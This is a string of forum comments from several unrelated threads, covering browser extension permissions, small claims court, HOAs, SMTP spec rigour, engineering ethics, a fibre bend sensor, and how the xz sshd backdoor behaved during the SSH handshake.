Yes, a network access and DOM write permission should be one and the same. I think the reason it isn't done is because there are so many ways to leak data over a network. If the extension can trigger a DNS lookup somehow, it can exfiltrate data.
Android used to have a network permission but Google removed it.
> Android used to have a network permission but Google removed it.
That's because google is in the ads business and wants apps to always be able to exfiltrate data to google (google analytics, google ads, etc) & display ads without needing additional permissions.
Having a network permission means there is an incentive for apps to not have the network permission which means they can't load ads. And Google wants you to look at their ads.
Yep, so after a few years of litigation and hours of time filling out forms on your state’s awful judicial portal (hopefully correctly!) you might stand a chance at a judgement. Then you can spend more time going back to court when they don’t pay, talking about time payment plans, etc. Maybe they’ll pay some of it, maybe not. Then they move to another state and you need to get your judgement domesticated there (with an in-person visit). Also, remember to keep renewing that judgement or it goes bye-bye!
Remember that the goal of the defendant is to exhaust the plaintiff, and cause them to spend more time than the judgement is worth. This is how the small claims system works.
> Yep, so after a few years of litigation and hours of time filling out forms on your state’s awful judicial portal (hopefully correctly!) you might stand a chance at a judgement
Do you have any examples of states where it takes hours of filling out forms for a small claims case?
The ones I've seen have been pretty simple.
California asks for plaintiff contact information, defendant contact information, how much money plaintiff is asking for and why the plaintiff believes they are owed that, the date that happened and how they calculated the amount, whether or not you've asked the defendant to pay you, a multiple choice question on which geographical aspect of the case takes place within the territory covered by the particular courthouse where you are filing, the zip code of the place that aspect of the case took place if you know it, whether or not the case is about an attorney-client fee dispute, if you are suing a public entity, if you've files more than 12 other small claims with the last 12 months in California, and if you claim is for more than $2500 and if is if you understand that you cannot file more than two small claims above $2500 in a single year.
California's is one of the more involved ones that I've seen.
Washington is pretty just much name the parties, how much you think you are owed, what it is owed for (checklist with categories like faulty workmanship, merchandise, rent, property damage, and a line to write in something else), and explanation of the reason for the claim.
It is. And someone will certainly make it happen. But most people don’t even know where their local small claims courts are, much less how to make a case, and lawyers cost money, and that is where most people end the conversation.
Yes, you can represent yourself and win, but it’s a lot of time, effort, and money (because time is money).
Someone will do this, and it will be great precedent. But most people will simply accept it because they don’t have the time or means.
As with race conditions, making things faster doesn't change things but only exposes preexisting problems. The preexisting problem I see here is sloppy definition of existence for the message: if you can see the message on a burning piece of paper, it should be considered to still exist (just as a message being sent with smoke signals does not disappear the moment it's committed to smoke).
E: The obvious way to fix this is to stop talking about messages existing/not existing, but talk in terms of messages being stored in X (or having been deleted from X), for some value of X.
It’s not the word “exists” that causes the problem (although it definitely gives it an added air of strange mystery). It’s the word “this.” Consider the case of a draft email I am writing on my laptop, but have to leave before finishing. Later, I resume composing the email on my phone and I hit send. But I do it in a hurry and mostly forget about it. The next morning, though, I open my laptop and I see the still unfinished draft I left there.
Now, when I try to finish and send that I’m hopefully going to get an error message. But “you already sent this email” is both right and wrong, since “this” email (the one I’m looking at) may have different contents from the one I sent.
Agreed that the best error message is just more precise though: “You are attempting to edit a draft that you already finished and sent from another device. Would you like to treat this as a new email?” Or something like that.
HOAs require more than (or a very specific extension of) freedom of association to exist: they require an ability to bind any future owners of a piece of land to join the HOA (regardless of how they acquired that land: via sale, inheritance, bankruptcy, ...). For property that's not real estate that's usually not possible (see e.g. inability of companies to provide binding promises on how the data they have are used after they go bankrupt). Given that this ability applies very inconsistently across types of property, it doesn't seem like an essential part of freedom of association.
> HOAs require more than […] freedom of association to exist: they require an ability to bind any future owners of a piece of land to join the HOA […].
You are often not buying a piece of land when you move to a HOA-linked residence, rather you can be buying a particular unit, but there are also 'common areas' that are the property of the legal entity of the HOA.
If you do not want to be part of an HOA then you have to purchase what is called (at least in Canada) freehold land.
> While most people hear the word “condo” and think of an apartment style unit, that’s not always the case. Some townhouses (and even certain detached homes) are considered condos too.
the GP wasn't talking about the type of structure but the legal organization of the property ownership. Canadian provinces have a Condominium Property Act that defines the legislative framework. The implementation can vary by types of units (ranging from apartment-style to single family homes) and the ownership - typically "you own the inside; communal outside" or "you own the inside & dirt; communal outside and shared public spaces". You don't hear talk of "The HOA" but rather "The Condo Board"
The local government in many areas is often requiring an HOA to be formed for new developments to manage stormwater and road maintenance that they don’t want to be responsible for.
In those situations the HOA could be seen as government imposed rather than purely “freedom of association”.
I own a 100 year old home so there is no HOA but it’s difficult for most people to afford such homes since there’s a limited supply and they’re often either in highly desirable or blighted city centers.
> If you do not want to be part of an HOA tell your real estate broker that this is one of the criteria for where you want to live.
Yes, tell your realtor "I don't want to look at any of the properties you have for sale, or any properties within the greater [insert city here] metro area, or for that matter any geographical location within 100 miles of here". He'd look at you less strangely, and might even chuckle instead of telling you to go fuck yourself and to not waste his time.
And the best part of all is that these two requests are essentially identical.
I would never consider any house encumbered with an HOA, and I would fire any realtor who ignored my wishes by showing one - but it's never been an issue, here in Seattle.
It can be done, yes. If the HOA owns and maintains common property then it has to dispose of that somehow. For example, it might need to sell the pool, get the city’s parks department to maintain the playground, and the wastewater department to maintain the drainage pond first.
To steelman the GP's POV: there are other parts of solutions to problems where similar levels of rigour are required and cannot be filled in by using a preexisting library (state machines for distributed business logic come to mind as an example). Eliminating the need for that here doesn't help that much in general, and might even make things worse, because it gives people less experience with tasks demanding rigour before they tackle ones that are both subtler and harder.
Learning to blindly follow a spec for the purposes of parsing the SMTP wire protocol doesn't give you extra ability to follow the state machine or distributed business logic specs better. It just adds to the overall opportunities for you to make a mistake. This also ignores the fact that SMTP specs is split across multiple RFCs with no single normative version which further complicates the probability that you implement the spec correctly in the first place.
Engineers get better faster because they leverage better tools and build tools to overcome their own shortcomings and leverage their strengths, not by constantly being beat into shape by unforgiving systems.
To be fair, what you and OP said is not an uncommon mentality. It's even shared in a way by Torvalds:
> [easier to do development with a debugger] And quite frankly, I don't care. I don't think kernel development should be "easy". I do not condone single-stepping through code to find the bug.
I do not think that extra visibility into the system is necessarily a good thing.
> Quite frankly, I'd rather weed out the people who don't start being careful early rather than late. That sounds callous, and by God, it _is_ callous. But it's not the kind of "if you can't stand the heat, get out the the kitchen" kind of remark that some people take it for. No, it's
something much more deeper: I'd rather not work with people who aren't careful. It's darwinism in software development. It's a cold, callous argument that says that there are two kinds of
people, and I'd rather not work with the second kind. Live with it.
He has similar views about unit tests btw.
I personally would prefer to work with people who are smart & understand systems and have machines take care of subtle details rather than needing to always be 100% careful at all times. No one writing an SMTP parser is at Torvald's level.
I'm not arguing that this excuses you from being careful or failing to understand things. I'm saying that defensively covering your flank against common classes of mistakes leads to better software than the alternative.
> This also ignores the fact that SMTP specs is split across multiple RFCs with no single normative version which further complicates the probability that you implement the spec correctly in the first place.
This is a point I agree with and the fact I see it mentioned so rarely, that standards are split across multiple RFC's makes me suspect that people don't mention it because they don't know because they never read them in the first place, and rather try to follow the implementation of some existing program.
It can get tedious and annoying, but I don't think it actually affects the likelihood that you'll implement something wrong. The RFCs link to each other when needed. Also groups of RFCs often get combined and edited into a single revised RFC for simplicity.
This makes me wonder: How could the IETF's approach to standardisation be improved? I'm not sure how to fix this problem without overhauling everything.
I have a power meter that sits in front of my kettle (that I also use as a teapot) that notifies me when the tea has finished brewing (i.e. when it finished boiling + a fixed delay).
I don't see why subjective morals cannot be realistically followed. Do you mean that it will mean sufficiently different things for different people that they any promise of this shape will not communicate much to strangers, or something else?
Might be more realistic than imposed dogma, you never know.
>I also think we need engineers who do jobs that are ugly to preserve our freedom.
I think so too.
If you build something that can be used for evil purposes, some people along the line are going to have to judge how to build it, or whether or not to build it at all.
This seems like it would always require some moral judgment of some kind.
An engineer who plays an important technical role should not be removed from this type responsibility.
For instance, consider making weapons, some of which might be used offensively, others only defensively.
Some engineers would have no moral qualms against either type, others who are more selective, and others not willing at all. But regardless, coexistence is assured if it is accepted from the outset as an engineering goal.
These are really quite "different things for different people", triggering a different degree of uneasiness as different lines are crossed. All based on a moral foundation, incidentally whose goalposts can be moved whether anyone wants them to or not.
All could be valid depending on the situation, but a creed for the profession can help to better focus outcome, away from the direction of making things worse for humanity because of your efforts.
Experience has shown you really don't want people in key positions without a moral compass to guide their aspirations, and engineering can be important.
yes, it communicates nothing. As mentioned by another commenter, it's effectively aspirational ethics, and I do not work towards aspirations, I work towards reality.
> The only variable inside its own table is yolAbejyiejuvnup=Evjtgvsh5okmkAvj, which in this context serves as a kill switch.
This seems false? The trie contained also strings like `WAYLAND_DISPLAY=`, so IIUC the backdoor would remain dormant if someone tried to run sshd from something that looks like an interactive session.
I don't understand what happens when the sensor is bent in more than one location.
At the beginning you mention a ToF sensor, which made me think that you're looking at reflections from the bends and measuring distance to them, but this seems not to be the case. ISTM that if you bend the sensor in two places, you'll simply get the sum of the logattenuations from both. If we assume that the "strength" of the bend continuously changes attenuation, ISTM that you need as many strands as there are gap locations to be able to disambiguate between any two sets of bends.
Am I misreading something or is this intended to operate in cases where we know only one bend is present?
In the paragraph "Visualization of the OptiGap Sensor System" looks like the gap pattern from multiple sensors is providing a unique signature that can be translated into the exact location on the length of the sensors. The mechanism for translating the wave forms to actual location seems to be based on a bayesian model, according to the "Realtime Machine Learning on a Microcontroller" paragraph.
Ssh does client authentication after handshake. The server is required to sign the handshake result with its private key, so you won't get past handshake if you are a server that claims to have a public key that you don't know the private key for.
E: see RFC 4253, sections 8 and 10, and RFC 4252 for corroboration
Huh, I had erroneously thought the exploit string was sent earlier in the connection, before the handshaking completed (note the "handshake failed" error in xzbot on successful exploit, and also the fact that no logging is done).
But you're right: we've verified the hostkey by the time we send the special certificate. So there's no way to effectively replay this without access to the server keys. My original comment is incorrect.
I'm actually surprised there's no logging at INFO or higher after this succeeds, given that openssh typically logs preauth connection closes. But I guess the crutch is that we never log connection opens and we only really log failures in handshaking, and it's not like the backdoor is going to go out of its way to log the fact that it opened itself...
